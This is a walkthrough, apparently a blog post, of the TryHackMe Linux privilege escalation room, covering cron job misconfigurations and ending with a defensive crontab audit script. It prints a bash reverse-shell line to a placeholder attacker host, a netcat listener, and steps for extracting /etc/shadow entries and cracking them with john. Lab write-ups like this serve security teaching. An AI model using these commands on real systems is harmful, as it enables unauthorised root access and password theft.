Cron Job to Root - Linux Privilege Escalation

What is Cron Job?

Cron jobs are used to schedule scripts or binaries to run at a specific time. Think of it as a Roomba (robot cleaner) that cleans the house at a set hour. By default, a cron job runs with the privileges of its owner, not those of the current user. Cron jobs are not vulnerable by default, but under certain conditions they can lead to privilege escalation.

System-wide cron jobs are listed in /etc/crontab. Here is how it looks:


The first star is the minute, the second is the hour, the third is the day of the month, the fourth is the month, and the fifth is the day of the week. For example, every Saturday at 23:45 (11:45 PM) would be: 45 (minute) 23 (hour) * * 6 (day of the week, numbered from Sunday, so 6 is Saturday). Now that we have established some background knowledge of cron jobs, let's discuss how to exploit a misconfiguration.

Demonstration:

I will be using the TryHackMe Linux Privilege Escalation room to show how to exploit a cron job misconfiguration. Here is the link to the room: https://tryhackme.com/room/linprivesc.
First we need to print all the cron jobs that are available, using this command: cat /etc/crontab. It is important to note that any user can view the cron jobs listed there; no special permission is required. This is the result:


Since we only care about getting root privileges, we focus only on the cron jobs that run as root. However, in a real penetration test you might need to build up your privileges step by step before you can get root access. Nevertheless, that is what we focus on here. There are 4 cron jobs I can exploit:

I am going to pick /home/karen/backup.sh, and go over antivirus.sh later since that one is special. The script is currently in karen's home directory; we go to that location and change the content of the script so that it creates a reverse shell back to our listener.

This is what is currently inside backup.sh:


and this is what we are going to change it to:

#!/bin/bash

/bin/bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1

One useful tool for creating a reverse shell is: revshell.
Note: you are able to write to the file because your user has write permission on it.

After you edit backup.sh, make the script executable (chmod +x backup.sh). Now, let's go back to the attacker machine and create a listener on port 6777. Then wait for 1 month for the cron job to execute the script.

This command creates a listener on port 6777: nc -lvnp 6777
Here are the results:

We got root privileges :) Now, what TryHackMe wants next is to find Matt's password. The first step is to read the content of /etc/passwd and put Matt's entry into a separate file. Then we do the same thing with /etc/shadow, again keeping only Matt's entry.

Then we run this command: unshadow passwd.txt shadow.txt > matt_information.txt

Then we start the brute force with this command: john --wordlist=/usr/share/wordlists/rockyou.txt matt_information.txt

After the command runs, we see that we were able to crack Matt's password: it was 123456.

Exploiting forgotten Cron Jobs

TryHackMe puts it in a way that is easy to understand:

  1. System administrators need to run a script at regular intervals.
  2. They create a cron job to do this.
  3. After a while, the script becomes useless, and they delete it.
  4. They do not clean up the relevant cron job.

You can use such a cron job to your advantage and escalate your privileges. What cron does is look through the directories on its PATH for a file whose name matches the command in the job. Once it finds a file with that name in any directory on that PATH, it executes it.

What the attacker does is create a file named antivirus.sh containing a reverse shell back to the listener. Cron then executes that job, and the attacker gets root privileges.
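Both weaknesses on this page (a root-owned job running a script other users can edit, and a forgotten job whose bare command name gets resolved through cron's PATH) can be found from the defender's side by auditing the crontab. The following audit helper is an added example, not code from the original post or from TryHackMe; it assumes GNU coreutils stat and builds a constructed lab copy in a temporary directory (the paths and permissions mimic the room's layout but are my own sample data) so it runs offline.

```bash
#!/bin/bash
# Added audit helper (not from the original post or TryHackMe). Reads a crontab in
# /etc/crontab layout (min hour dom mon dow user command) and reports, for root jobs:
#   writable FILE      script owned by someone else or group/other writable (backup.sh case)
#   missing NAME       script no longer exists (a forgotten job)
#   path-dir DIR NAME  bare command name resolved on cron's PATH, and DIR, searched
#                      before the real script, is writable (antivirus.sh case)
# Assumes GNU coreutils stat. Usage: audit_crontab FILE [TRUSTED_UID]  (default 0 = root;
# pass "$(id -u)" when trying it on a lab copy as an unprivileged user)
unsafe() {  # true if file or dir $1 can be modified by someone other than TRUSTED
    local s; s=$(stat -c '%a %u' "$1") || return 1
    set -- $s                                         # $1 = octal mode, $2 = owner uid
    [ "$2" != "$TRUSTED" ] || (( 8#$1 & 8#022 ))     # foreign owner or g/o write bit
}
audit_crontab() {
    local file="$1" TRUSTED="${2:-0}" path="/usr/bin:/bin"
    local f1 f2 f3 f4 f5 user script rest name dir
    while read -r f1 f2 f3 f4 f5 user script rest; do
        case "$f1" in
            ''|'#'*|'@'*) continue ;;                 # blank, comment, @reboot-style
            PATH=*) path="${f1#PATH=}"; continue ;;   # cron searches this PATH
            *=*) continue ;;                          # MAILTO=, SHELL=, ...
        esac
        [ "$user" = root ] || continue                # only root jobs, as on this page
        name="$script"
        if [ "${script#/}" = "$script" ]; then        # bare name: resolve like cron does
            script=""
            for dir in ${path//:/ }; do
                [ -d "$dir" ] && unsafe "$dir" && echo "path-dir $dir $name"
                [ -e "$dir/$name" ] && { script="$dir/$name"; break; }
            done
        fi
        if [ -z "$script" ] || [ ! -e "$script" ]; then echo "missing $name"
        elif unsafe "$script"; then echo "writable $script"; fi
    done < "$file"
}
make_lab() {  # constructed sample: a crontab plus scripts mimicking the room's layout
    local lab; lab=$(mktemp -d)
    mkdir -p "$lab/home/karen" "$lab/usr/bin" "$lab/usr/local/bin"
    printf '#!/bin/bash\necho backup\n' > "$lab/home/karen/backup.sh"
    printf '#!/bin/bash\necho ok\n' > "$lab/usr/bin/safe.sh"
    chmod 755 "$lab/home/karen" "$lab/usr/bin" "$lab/usr/bin/safe.sh"
    chmod 777 "$lab/home/karen/backup.sh" "$lab/usr/local/bin"   # the weak permissions
    printf 'PATH=%s/usr/local/bin:%s/usr/bin\n* * * * * root %s/home/karen/backup.sh\n' \
        "$lab" "$lab" "$lab" > "$lab/crontab"
    printf '* * * * * root antivirus.sh\n* * * * * root safe.sh\n' >> "$lab/crontab"
    echo "$lab"
}
lab=$(make_lab); audit_crontab "$lab/crontab" "$(id -u)"; rm -rf "$lab"
```

Run against the real /etc/crontab (and each file in /etc/cron.d) with the default trusted uid, the fix for every finding is the same: make the script and every directory on cron's PATH root-owned and not group/other writable, or delete the stale job.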

Here are some pictures showing the process (credit goes to TryHackMe):



That’s all, thank you for reading.